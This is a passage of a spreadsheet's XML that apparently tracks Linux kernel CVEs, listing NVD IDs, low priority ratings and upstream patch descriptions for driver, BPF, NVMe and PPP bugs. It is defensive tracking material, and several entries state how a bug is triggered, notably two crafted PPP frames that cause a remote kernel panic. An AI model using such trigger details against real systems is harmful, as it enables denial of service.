because struct_size(payload, data, 0) is just the header. The fill loop
then does not run, so offset stays zero and the request is submitted with
a zero-length buffer.
On firmware without AIE2_NPU_COMMAND that ends at the opcode check, since
op is still ERT_INVALID_CMD and aie2_get_chain_msg_op() answers
MSG_OP_MAX_OPCODE. aie2_get_npu_chain_msg_op() answers
MSG_OP_CHAIN_EXEC_NPU whatever it is given, so there the submission
continues to drm_clflush_virt_range(cmd_buf, 0), which reads the byte
before the buffer and faults on the vmap guard page. EXEC_CMD is
reachable by any process that can open the render node.
Reject the request instead.</t>
        </is>
      </c>
      <c r="T759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98145</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98146</t>
        </is>
      </c>
      <c r="D760" s="5" t="inlineStr"/>
      <c r="E760" s="5" t="inlineStr"/>
      <c r="F760" s="5" t="inlineStr"/>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="inlineStr"/>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr"/>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q760" s="5" t="inlineStr"/>
      <c r="R760" s="5" t="inlineStr"/>
      <c r="S760" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Remove __counted_by from struct amdxdna_cmd_chain
struct amdxdna_cmd_chain contains a flexible array annotated with
__counted_by(command_count). Since the structure is stored in shared
AMDXDNA_BO_SHARE memory, userspace can modify command_count concurrently.
If command_count is changed to zero, the bounds check generated from
__counted_by may fail and trigger a kernel panic.
Remove __counted_by to avoid relying on the userspace-controlled
command_count for the flexible array bounds check.</t>
        </is>
      </c>
      <c r="T760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98146</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98147</t>
        </is>
      </c>
      <c r="D761" s="5" t="inlineStr"/>
      <c r="E761" s="5" t="inlineStr"/>
      <c r="F761" s="5" t="inlineStr"/>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="inlineStr"/>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr"/>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q761" s="5" t="inlineStr"/>
      <c r="R761" s="5" t="inlineStr"/>
      <c r="S761" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
printk: Don't WARN on kthread_run failure.
Since __kthread_create_on_node() returns -EINTR upon SIGKILL,
we should not use WARN_ON() in order to catch kthread_run() failure.</t>
        </is>
      </c>
      <c r="T761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98147</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98148</t>
        </is>
      </c>
      <c r="D762" s="5" t="inlineStr"/>
      <c r="E762" s="5" t="inlineStr"/>
      <c r="F762" s="5" t="inlineStr"/>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="inlineStr"/>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr"/>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q762" s="5" t="inlineStr"/>
      <c r="R762" s="5" t="inlineStr"/>
      <c r="S762" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/gud: validate GUD_ROTATION_0 is present in supported rotations
The rotation argument to drm_plane_create_rotation_property() is set to
DRM_MODE_ROTATE_0, and the device reported rotation bitmask is used as
the supported_rotations argument. The driver never validates that
GUD_ROTATION_0 is present, so a device that omits it from its
GUD_PROPERTY_ROTATION triggers the
WARN_ON(rotation &amp; ~supported_rotations) in
drm_plane_create_rotation_property()
Fix this by skipping the creation of rotation property if the device
doesn't have the GUD_ROTATION_0 bit</t>
        </is>
      </c>
      <c r="T762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98148</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98149</t>
        </is>
      </c>
      <c r="D763" s="5" t="inlineStr"/>
      <c r="E763" s="5" t="inlineStr"/>
      <c r="F763" s="5" t="inlineStr"/>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="inlineStr"/>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr"/>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q763" s="5" t="inlineStr"/>
      <c r="R763" s="5" t="inlineStr"/>
      <c r="S763" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix percpu map update indexing with sparse CPU IDs
Per-CPU array, hash, and cgroup storage map updates without BPF_F_CPU
or BPF_F_ALL_CPUS use a value buffer whose per-CPU slots are packed in
possible-CPU order. The buffer is sized as:
  round_up(value_size, 8) * num_possible_cpus()
The update paths iterate over possible CPUs, but use the logical CPU ID
to calculate the source offset:
  value + size * cpu
This only works when possible CPU IDs are contiguous starting at zero.
For example, with a possible CPU mask of 0,2-3, the buffer contains
three slots corresponding to CPUs 0, 2, and 3. CPU2 is therefore
expected to use slot 1 and CPU3 slot 2. Instead, the current code uses
slots 2 and 3 respectively, causing incorrect per-CPU values and an
out-of-bounds read from the update buffer for CPU3.
The corresponding lookup paths already use a dense offset while
iterating over possible CPUs. Do the same for the array, hash, and
cgroup storage update paths, advancing the source offset once for each
possible CPU. BPF_F_ALL_CPUS continues to use the same value for every
CPU.</t>
        </is>
      </c>
      <c r="T763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98149</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98151</t>
        </is>
      </c>
      <c r="D764" s="5" t="inlineStr"/>
      <c r="E764" s="5" t="inlineStr"/>
      <c r="F764" s="5" t="inlineStr"/>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="inlineStr"/>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q764" s="5" t="inlineStr"/>
      <c r="R764" s="5" t="inlineStr"/>
      <c r="S764" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix REG INVARIANTS VIOLATION on speculative pointer arithmetic
Take the following unprivileged program as an example:
	r0 = bpf_map_lookup_elem(...)	/* PTR_TO_MAP_VALUE, offset 0 */
	...
	14: r0 += r1			/* r1 is a bounded scalar */
	15: r9 = r0
Loading it triggers a verifier warning from reg_bounds_sanity_check():
	verifier bug: REG INVARIANTS VIOLATION (alu): const subreg tnum out
	of sync with range bounds r64={.base=0x0, .size=0x0}
	r32={.base=0x0, .size=0xffffffff} var_off=(0x0, 0x0)
What happens:
1. Processing insn 14 (r0 += r1) in adjust_ptr_min_max_vals(), the new
   offset is computed into dst_reg's var_off and 32/64-bit ranges.
2. Because pointer registers do not track 32-bit subregister bounds,
   __mark_reg32_unbounded() first sets r32 to the full range; r32 is
   re-derived from the offset at the end of the function by
   reg_bounds_sync().
3. On the unprivileged path, sanitize_ptr_alu() is called and, via
   sanitize_speculative_path() -&gt; push_stack(), snapshots the current
   register state and schedules the next instruction (insn 15) to be
   verified directly as a speculative path.
4. That snapshot is taken between step 2 and the final reg_bounds_sync():
   at this point dst_reg's var_off still holds the (const) original
   offset while r32 has just been blanked to the full range, i.e. the two
   are out of sync. When the speculative path later verifies insn 15
   (r9 = r0), the inconsistent state reaches reg_bounds_sanity_check() and
   trips the warning.
var_off and the 32-bit range must always be consistent. There are two
ways to keep the snapshot consistent:
  1. sync var_off and r32 before the snapshot so they match, or
  2. leave r32 at its original (already consistent) value and blank it
     only after the snapshot.
The whole point of sanitize_ptr_alu() is to insert a harmless masking
sequence that keeps the access in bounds under speculation, so the state
it snapshots should faithfully represent that. Take approach 2: move
__mark_reg32_unbounded() to after sanitize_ptr_alu(), so the speculative
snapshot keeps the pointer's original, consistent r32. The non-speculative
path is unchanged: r32 is still blanked before the offset is applied and
re-derived by reg_bounds_sync().</t>
        </is>
      </c>
      <c r="T764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98151</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98152</t>
        </is>
      </c>
      <c r="D765" s="5" t="inlineStr"/>
      <c r="E765" s="5" t="inlineStr"/>
      <c r="F765" s="5" t="inlineStr"/>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr"/>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr"/>
      <c r="S765" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-rdma: fix queue leak when connect backlog is exceeded
When pending disconnecting queues exceed the backlog limit, the
connect path only drops the device reference and leaks the newly
allocated queue and its IB resources.</t>
        </is>
      </c>
      <c r="T765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98152</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98153</t>
        </is>
      </c>
      <c r="D766" s="5" t="inlineStr"/>
      <c r="E766" s="5" t="inlineStr"/>
      <c r="F766" s="5" t="inlineStr"/>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr"/>
      <c r="S766" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: fix racy access to FDP placement id array
nvme_query_fdp_info() is called per-path and therefore prone to races.
It populates head-&gt;nr_plids/head-&gt;plids for fdp registration.
But nothing protects that pair from concurrent access - two paths scanning
the same namespace can race to populate it.
Avoid the race by moving this initialization work to nvme_alloc_ns_head()
which is called once per shared namespace.</t>
        </is>
      </c>
      <c r="T766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98153</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98155</t>
        </is>
      </c>
      <c r="D767" s="5" t="inlineStr"/>
      <c r="E767" s="5" t="inlineStr"/>
      <c r="F767" s="5" t="inlineStr"/>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr"/>
      <c r="S767" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/qaic: Address potential out-of-bounds read in resp_worker()
Although 'commit 2feec5ae5df7 ("accel/qaic: Handle DBC deactivation if the
owner went away")' fixes the scenario it was intended for by walking the
message and only decoding QAIC_TRANS_DEACTIVATE_FROM_DEV, if present, it
skipped over the bounds checking code that is included in decode_message().
This could lead to issues such as reading past the slab allocation's end,
infinite loops or kernel panics. For those issues to happen, a malformed
wire message is needed to be sent from the device.
Instead of duplicating the bounds checking code already present in
decode_message(), use the function inside resp_worker().</t>
        </is>
      </c>
      <c r="T767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98155</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98157</t>
        </is>
      </c>
      <c r="D768" s="5" t="inlineStr"/>
      <c r="E768" s="5" t="inlineStr"/>
      <c r="F768" s="5" t="inlineStr"/>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr"/>
      <c r="S768" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
EDAC/device_sysfs: Use kstrtouint() for poll_msec to prevent truncation
The poll_msec sysfs store file uses simple_strtoul() which accepts an unsigned
long, but the target field (poll_msec) is unsigned int. On 64-bit systems,
a value &gt; UINT_MAX is silently truncated when stored.
Fix the mismatch by using kstrtouint() instead. This rejects values larger
than UINT_MAX at parse time, making truncation impossible. Also add a check
for value &lt; 1 to reject the 0-delay case, which would cause the poll work to
spin without delay and consume 100% CPU.</t>
        </is>
      </c>
      <c r="T768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98157</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98158</t>
        </is>
      </c>
      <c r="D769" s="5" t="inlineStr"/>
      <c r="E769" s="5" t="inlineStr"/>
      <c r="F769" s="5" t="inlineStr"/>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="inlineStr"/>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr"/>
      <c r="S769" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ppp_async: drop the errored frame instead of resetting its headroom
ppp_receive_nonmp_frame() prepends a two-byte direction tag before running
the pass/active BPF filters:
	*(__be16 *)skb_push(skb, 2) = htons(PPP_FILTER_INBOUND_TAG);
Nothing on the receive path guarantees those two bytes of headroom. The
frame-error path in ppp_async's process_input_packet() resets a reused skb's
headroom to zero while claiming to restore it to a freshly allocated state -
but a fresh skb from dev_alloc_skb() carries NET_SKB_PAD:
	err:
		if (skb) {
			/* make skb appear as freshly allocated */
			skb_trim(skb, 0);
			skb_reserve(skb, - skb_headroom(skb));
		}
ap-&gt;rpkt still points at that skb, so the next frame is reassembled into it
with no headroom at all. A peer that sends a bad-FCS frame followed by one
beginning ff 03 then leaves a single byte of headroom by the time the filter
tag is pushed, which lands one byte below skb-&gt;head:
  skbuff: skb_under_panic: len:49 put:2 head:ffff888003c10000
          data:ffff888003c0ffff tail:0x30 end:0x640 dev:&lt;NULL&gt;
  kernel BUG at net/core/skbuff.c:214!
  RIP: 0010:skb_panic+0x13e/0x230
  Call Trace:
   skb_push+0xbd/0x100
   ppp_receive_nonmp_frame+0x48a/0x1d10
   ppp_input+0x4e9/0x2f80
   ppp_async_process+0x2a/0xe0
   tasklet_action_common+0x20f/0x8a0
   handle_softirqs+0x18e/0x590
  Kernel panic - not syncing: Fatal exception in interrupt
Zeroing the headroom violates the NET_SKB_PAD guarantee that dev_alloc_skb()
gives the rest of the receive path. Besides the filter panic above, when CCP
compression is enabled ppp_decompress_frame() hands skb-&gt;data - 2 to
-&gt;decompress()/-&gt;incomp(), which then reads out of bounds before skb-&gt;head
for the same reason.
Rather than restore the headroom, drop the errored frame - as ppp_synctty
already does on its error path - and clear ap-&gt;rpkt so the next frame is
reassembled into a fresh skb with proper headroom. This is simpler and fixes
both the filter under-panic and the CCP out-of-bounds read.
The original V1 of this patch made room in ppp_receive_nonmp_frame() with
skb_cow_head(); Eric pointed out that fixing the root cause in the transport
is the right approach.
Found by fuzzing the PPP receive path with a mutating peer on a pty; it is an
interesting (remote) DoS: root configures PPP, the peer supplies two crashing
frames. The reproducer (repro-ppp-skb.c, unchanged from v1) panics in about a
second, and returns cleanly with this applied.</t>
        </is>
      </c>
      <c r="T769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98158</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98159</t>
        </is>
      </c>
      <c r="D770" s="5" t="inlineStr"/>
      <c r="E770" s="5" t="inlineStr"/>
      <c r="F770" s="5" t="inlineStr"/>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="inlineStr"/>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr"/>
      <c r="S770" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7921: validate CLC firmware records
The CLC region is supplied by firmware, but the loader trusts the
region count and each record length. A malformed image can make the
region table pointer precede the firmware buffer, make the record loop
fail to advance, or index phy-&gt;clc past its end. Validate the table and
record bounds before dereferencing or copying.</t>
        </is>
      </c>
      <c r="T770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98159</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98160</t>
        </is>
      </c>
      <c r="D771" s="5" t="inlineStr"/>
      <c r="E771" s="5" t="inlineStr"/>
      <c r="F771" s="5" t="inlineStr"/>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K771" s="5" t="inlineStr"/>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr"/>
      <c r="S771" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix mismatched free of HalData in rtw_sdio_if1_init()
padapter-&gt;HalData is allocated via vzalloc(), but incorrectly freed
using kfree() in the rtw_sdio_if1_init() error path. Using kfree() to
release this vmalloc-backed buffer can lead to memory corruption.
Use rtw_hal_data_deinit() to pair the free correctly and free
HalData with vfree().
The bug was first flagged by an experimental static analysis tool we
are developing for kernel memory-management bugs. Manual inspection
confirms that the issue is still present in current mainline.
An x86_64 allyesconfig build showed no new warnings. As we do not have
suitable RTL8723BS SDIO hardware to test with, no runtime testing was
able to be performed.</t>
        </is>
      </c>
      <c r="T771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98160</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98161</t>
        </is>
      </c>
      <c r="D772" s="5" t="inlineStr"/>
      <c r="E772" s="5" t="inlineStr"/>
      <c r="F772" s="5" t="inlineStr"/>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr"/>
      <c r="S772" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvdimm: pmem: keep PREFLUSH before data writes
pmem_submit_bio() records a REQ_PREFLUSH error, but continues to copy the
bio data and can later overwrite the error with a successful REQ_FUA flush.
That lets data writes run after a failed preflush and can complete the bio
successfully despite the failed ordering barrier.
Run the REQ_PREFLUSH flush synchronously before touching the bio data and
complete the bio with the flush error if it fails. Keep asynchronous flush
chaining for REQ_FUA. At that point, data copy has completed and the parent
bio can wait for the chained flush bio.</t>
        </is>
      </c>
      <c r="T772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98161</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98162</t>
        </is>
      </c>
      <c r="D773" s="5" t="inlineStr"/>
      <c r="E773" s="5" t="inlineStr"/>
      <c r="F773" s="5" t="inlineStr"/>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="inlineStr"/>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr"/>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q773" s="5" t="inlineStr"/>
      <c r="R773" s="5" t="inlineStr"/>
      <c r="S773" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: fix tree connection leak in smb2_tree_connect()
See the procedure below:
  smb2_tree_connect
    ksmbd_tree_conn_connect
      xa_store(&amp;sess-&gt;tree_conns, tree_conn-&gt;id, tree_conn)
      ksmbd_counter_inc(KSMBD_COUNTER_TREE_CONNS)
      ksmbd_share_tree_conn_inc(sc)
